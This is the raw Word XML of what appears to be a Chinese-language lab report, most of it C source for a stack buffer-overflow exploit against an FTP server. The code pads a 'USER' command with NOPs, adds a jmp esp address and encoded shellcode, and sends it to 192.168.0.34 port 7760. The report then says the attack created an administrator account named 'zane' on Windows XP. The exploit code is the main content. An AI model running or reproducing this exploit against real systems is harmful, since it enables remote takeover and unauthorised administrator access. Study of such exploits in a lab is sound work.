    <w:p w14:paraId="607D2AD8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"\x6f\x45\x33\x31\x30\x50\x6e\x72\x45\x50\x74\x65\x70\x30\x75\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE191FC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"\x63\x70\x65\x73\x42\x37\x50\x51\x6a\x62\x41\x62\x4e\x72\x45\x71"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA5181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"\x30\x71\x75\x70\x6e\x50\x61\x72\x5a\x37\x50\x46\x4f\x43\x71\x71"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05059D5B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"\x54\x43\x74\x41\x30\x36\x46\x51\x36\x55\x70\x70\x6e\x43\x55\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43725738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"\x74\x55\x70\x30\x6c\x72\x4f\x32\x43\x35\x31\x50\x6c\x70\x67\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488CACD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"\x32\x72\x4f\x54\x35\x42\x50\x35\x70\x32\x61\x71\x74\x42\x4d\x62"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8CA93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"\x49\x30\x6e\x55\x39\x33\x43\x73\x44\x71\x62\x51\x71\x72\x54\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE05AC5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"\x6f\x54\x32\x31\x63\x45\x70\x71\x6a\x42\x41\x62\x4e\x41\x75\x55"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63070A96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"\x70\x46\x4f\x30\x41\x30\x44\x30\x44\x43\x30\x4a";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E0039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1FCB5B7B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5781502E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void genarate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EDCE07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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C05A9CD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strcat(exploit,"USER "); //0-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FED59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ab/>
        <w:t>//填充NOP//5-489=0-485</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55513AEF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for(int i=5;i&lt;490;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284EC73B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DE531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exploit[i]='\x90';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E82EE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C41E7A8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37611A55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//添加jump_esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C03ED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strcat(exploit,jum_esp); //486-489</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F54CB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strcat(exploit,"\x90\x90\x90\x90");//490-493</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14C457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//添加shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD1A37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strcat(exploit,scode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A39D4E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strcat(exploit,"\r\n\0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD66D57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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D5854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54A2716C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int main(int argc, char* argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E60D14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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290B817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//生成shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F34610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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    genarate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3A974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printf("%s\n",exploit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18B896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//准备建立socket连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E0645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WSADATA wsaData;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F34C40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WORD    wVersionRequested;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0FC27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int     err,n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A965A42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char    buff[512];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651153A4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err=WSAStartup(MAKEWORD(2,2),&amp;wsaData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2A739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if(err!=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A961E16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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CE672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SOCKET clientSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F15C95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SOCKADDR_IN address;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7779B0AB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address.sin_addr.S_un.S_addr=inet_addr("192.168.0.34");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B8995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address.sin_family=AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2859DD8A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address.sin_port=htons(7760);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94CAC1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59331CDD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printf("开始连接!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E72075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if(connect(clientSock,(SOCKADDR*)&amp;address,sizeof(address))==SOCKET_ERROR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4D7A1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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161455C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printf("连接失败\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE964B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   return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C873BE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D23B6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recv(clientSock,str,1000,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2003FE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printf("%s\n",str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45D8F4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54A0CC86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printf("发送exploit!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D32040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send(clientSock,exploit,strlen(exploit),0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988FC7C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printf("发送长度:%d\n",strlen(exploit));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574AF497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719632FF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recv(clientSock,str,1000,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2F614A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closesocket(clientSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B42913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WSACleanup();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898ABE5" w14:textId="77777777" w:rsidR="001B5F24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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1698BC" w14:textId="7A6A3BB7" w:rsidR="006B6945" w:rsidRDefault="001B5F24" w:rsidP="001B5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B238E" w14:textId="56354B12" w:rsidR="006B6945" w:rsidRDefault="006B6945" w:rsidP="001B5F24">
      <w:pPr>
        <w:ind w:firstLine="42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odeblocks编译时</w:t>
      </w:r>
      <w:r w:rsidR="001B5F24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>，选择</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6945">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>左上角工具栏settings-&gt;complier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D43EB01" w14:textId="77777777" w:rsidR="006B6945" w:rsidRDefault="006B6945" w:rsidP="00B839DD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76910DA6" w14:textId="625256B7" w:rsidR="006B6945" w:rsidRDefault="006B6945" w:rsidP="00B839D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4DF1F6" wp14:editId="3F30767E">
            <wp:extent cx="5274310" cy="4565176"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="7" name="图片 7" descr="https://img-blog.csdn.net/20180313235237894?watermark/2/text/Ly9ibG9nLmNzZG4ubmV0L1N1bl9EZWFu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313235237894?watermark/2/text/Ly9ibG9nLmNzZG4ubmV0L1N1bl9EZWFu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/7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6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="45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582C0" w14:textId="672A7DA4" w:rsidR="006B6945" w:rsidRDefault="006B6945" w:rsidP="001B5F24">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6945">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6945">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidR="001B5F24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6945">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6945">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>windows/system32目录下选择ws2_32.dll(ws2_32.dll是Windows Sockets应用程序接口， 用于支持Internet和网络应用程序。)</w:t>
      </w:r>
      <w:r w:rsidR="001B5F24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>后可以成功编译。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CDCCC" w14:textId="37BC9C4E" w:rsidR="006B6945" w:rsidRDefault="006B6945" w:rsidP="00BF6D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944992" wp14:editId="11C91DBF">
            <wp:extent cx="3840480" cy="1549021"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="https://img-blog.csdn.net/20180313235513196?watermark/2/text/Ly9ibG9nLmNzZG4ubmV0L1N1bl9EZWFu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313235513196?watermark/2/text/Ly9ibG9nLmNzZG4ubmV0L1N1bl9EZWFu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/7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35"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3840480" cy="15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56DB7" w14:textId="55AF377D" w:rsidR="00B839DD" w:rsidRDefault="00BF6DF2" w:rsidP="00BF6DF2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>查看结果，在控制面板中选择用户账户，发现</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>成功在window</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>xp下建立了一个z</w:t>
      </w:r>
      <w:r w:rsidR="00057DC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ane</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>的用户，并设置为管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBCA519" w14:textId="6D6DBC8B" w:rsidR="00B839DD" w:rsidRPr="008159EC" w:rsidRDefault="00057DC5" w:rsidP="00BF6DF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E70CB2" wp14:editId="0C2E10F6">
            <wp:extent cx="4182059" cy="1514686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881C4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9DD" w:rsidRPr="00815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25C66" w14:textId="77777777" w:rsidR="006F7C54" w:rsidRDefault="006F7C54" w:rsidP="0074759A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="72C4E779" w14:textId="77777777" w:rsidR="006F7C54" w:rsidRDefault="006F7C54" w:rsidP="00747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114E4" w14:textId="77777777" w:rsidR="006F7C54" w:rsidRDefault="006F7C54" w:rsidP="0074759A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6EB7D3BB" w14:textId="77777777" w:rsidR="006F7C54" w:rsidRDefault="006F7C54" w:rsidP="00747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B69C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50309EF0"/>
    <w:lvl w:ilvl="0" w:tplc="6BBA16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E3789A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50309EF0"/>
    <w:lvl w:ilvl="0" w:tplc="6BBA16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0D"/>
    <w:rsid w:val="00057DC5"/>
    <w:rsid w:val="000D5968"/>
    <w:rsid w:val="00133FE4"/>
    <w:rsid w:val="001341F7"/>
    <w:rsid w:val="0019552E"/>
    <w:rsid w:val="001B5F24"/>
    <w:rsid w:val="002C2D38"/>
    <w:rsid w:val="00353A20"/>
    <w:rsid w:val="00605EFA"/>
    <w:rsid w:val="006B6945"/>
    <w:rsid w:val="006F7C54"/>
    <w:rsid w:val="0074759A"/>
    <w:rsid w:val="0079456E"/>
    <w:rsid w:val="008159EC"/>
    <w:rsid w:val="00841A0D"/>
    <w:rsid w:val="00A26BD3"/>
    <w:rsid w:val="00A579B7"/>
    <w:rsid w:val="00B839DD"/>
    <w:rsid w:val="00BF6DF2"/>
    <w:rsid w:val="00C12C4F"/>
    <w:rsid w:val="00D05065"/>
    <w:rsid w:val="00DD2BA5"/>
    <w:rsid w:val="00E04BA0"/>
    <w:rsid w:val="00E975A3"/>
    <w:rsid w:val="00EA7E70"/>
    <w:rsid w:val="00F172E2"/>
    <w:rsid w:val="00F20584"/>
    <w:rsid w:val="00F5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320C8B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{43B0E7A8-3F8F-4A32-8A2C-D8136EB2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7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5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59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75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7475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475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759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4759A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A26BD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26B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6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h</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wh h</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-11T14:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-01T07:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>